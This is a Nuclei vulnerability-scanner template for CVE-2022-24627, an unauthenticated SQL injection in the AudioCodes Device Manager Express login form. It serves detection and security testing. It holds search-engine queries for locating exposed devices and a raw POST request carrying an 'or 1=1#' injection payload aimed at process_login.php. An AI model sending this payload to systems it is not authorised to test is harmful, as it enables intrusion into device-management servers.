nuclei-templates/http/cves/2022/CVE-2022-24627.yaml

59 lines
1.8 KiB
YAML

id: CVE-2022-24627
info:
name: AudioCodes Device Manager Express - SQL Injection
author: geeknik
severity: critical
description: |
An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
reference:
- https://seclists.org/fulldisclosure/2023/Feb/12
- https://nvd.nist.gov/vuln/detail/CVE-2022-24627
- https://github.com/tr3ss/newclei
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24627
cwe-id: CWE-89
epss-score: 0.00109
epss-percentile: 0.43163
cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: audiocodes
product: device_manager_express
shodan-query: title:"Audiocodes"
fofa-query: title="audiocodes"
google-query: intitle:"audiocodes"
tags: cve,cve2022,seclists,sqli,audiocodes
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "audiocodes</title>")'
internal: true
- raw:
- |
POST /admin/AudioCodes_files/process_login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=&domain=&p=%5C%27or+1%3D1%23
matchers:
- type: word
part: body
words:
- "SQL syntax"
- "mysql_fetch"
- "You have an error in your SQL syntax"
condition: or
# digest: 4a0a00473045022100ba45b549e145408af633369b555485543fadac44bdd9055d24dd3b1aa2b7e6810220618bc9f7d62c05f168255ce97860dc0e76204349a61ffc57a6cefa9bf39a650c:922c64590222798bb761d5b6d8e72950